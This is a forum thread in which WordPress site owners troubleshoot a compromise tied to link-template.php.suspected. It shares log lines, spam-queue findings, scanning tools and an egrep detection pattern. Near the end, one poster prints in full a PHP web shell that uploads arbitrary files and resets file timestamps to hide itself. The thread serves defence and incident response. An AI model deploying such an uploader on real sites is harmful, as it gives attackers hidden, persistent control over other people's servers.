link-template.php.suspected

This line worried me in my logs :

mysite.com 184.168.152.164 – – [11/Jun/2015:14:51:23 +0100] “POST /wp-includes/js/tinymce/plugins/page.php HTTP/1.0” 403 925 “-” “Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344”

Before it was giving a 200 code (now 403 in the above line)

I looked at the code and it was malicious so I deleted it, they are still trying to get to it, hence the 403 now.

Lets see if this helps…

I found additional malicious code by checking the contents of the “frozen” status emails under Mail Queue manager in WHM.

One of the lines is “X-PHP-Script: YOURSITE.com/folder/folder/folder/list.php”. List.php was one of the virus the previous commands failed to pick up. This code got into my NON-wordpress site.

I also noticed the hackers are using “[email protected]” to send spam mails. Currently trying to search @yoursite.com in my databases, will update if I find anything.

And this one was causing issues:

website.com/wp-content/plugins/cached_data/mail.php

No idea where it came from!

I see Rev Slider is being mentioned a lot regarding viruses, whihc I had on this site. I have same WordPress version and other pluings on a large number of sites, all fine, but this one which had Rev Slider installed.

I have deleted it for now…

Thanks for the Mail Queue tip… I just found 20,000 ‘Frozen’ mails in the outgoing queue on WHM. I’ve reset permissions for our mail server and also reset it which has stopped them queuing up (at a rate of 50 per minute. None have been added in the past 30mins so I’ll keep monitoring!

Another suggestion. If CPhulk is not currently enabled, do enable it now and set it to notify you when there are 3 or more failed attempts. (You can set it to 1 or 2 if you wish).

I looked through records over the past 3 days and spotted hackers trying to login at some point. However the CPhulk email notification was in the frozen mails due to the tens of thousands of spam in queue.

If you do have these notifications setup, very likely the notifications were trigerred but stuck.

So, changing the file permissions on link-template.php definitely seems to have kept my site up now. It doesn’t remove the infected code, but it does mean that my site visitors aren’t faced with a glaring problem.

Does anyone know how to see what code is filling the mail queues? I have the sendmail service stopped. I can purge the queue, but shortly after turning the service back on, I’ve got 1000’s in there again. They are all created by my apache user. File auditing will only tell me that they were put there by the apache user on _____ date/time. I’d like to come up with a way to determine what code is putting them there. Any advice would be warmly welcomed.

Same problem here. I’ve updated plugins and the theme but the problem with link-template.php is consistent. Every day there is another php files in random folders that sends spam. So, it is obviously something wrong with the base. Does anyone know what type of code should I look there?

This may help others.

maldet scans if you have shell access.

Wordfence, add plugin and theme and other files in options.

Anti-malware another plugin

Even after running all those this shell command found some more

egrep -Rl ‘\$GLOBALS.*\\x’ /home/username/public_html

And created a cron job to check and rename the file every five minutes as per the reference in https://www.ads-software.com/support/topic/link-templatephpsuspected/page/2?replies=60 by 518tech

Hey everyone,

Sounds like people are experiencing something similar to what we are on one of our sites. We found one extra file that might help others narrow down the source.

We found it by looking over our access logs for IPs that accessed the known suspicious files and looking at other files they accessed. We found a couple references to “license.php” at the public_html level. This file in particular had a Last Modified date of “Dec 31st, 1968”. Fun fact: that means the time stamp on the file is literally 0.

Obviously we didn’t edit a file in 1969 and opening it up, we found the following

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
<title>utf</title>
</head>
<body>
<?php
print "<h1>#p@$c@#</h1>\n";
echo "Your IP: ";
echo $_SERVER['REMOTE_ADDR'];
echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
echo "<input type=\"file\" name=\"filename\"><br> \n";
echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
echo "</form>\n";
if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))
	{
	move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
	$file = $_FILES/*;*/["filename"]["name"];
	echo "<a href=\"$file\">$file</a>";
	} else {
	echo("empty");
	}
$filename = $_SERVER[SCRIPT_FILENAME];
touch/*;*/($filename, $time);
?>
</body>
</html>

This more or less confirms our suspicions that the hack is able to mask the modified date of the files it creates to help hide it among older files.

We’re waiting to see if removing the content of the file prevents future outbreaks, but I wanted to post here to help others in their search and see if anyone’s uncovered a workable solution other than the cron job band-aid (which is a good idea, but not a permanent solution)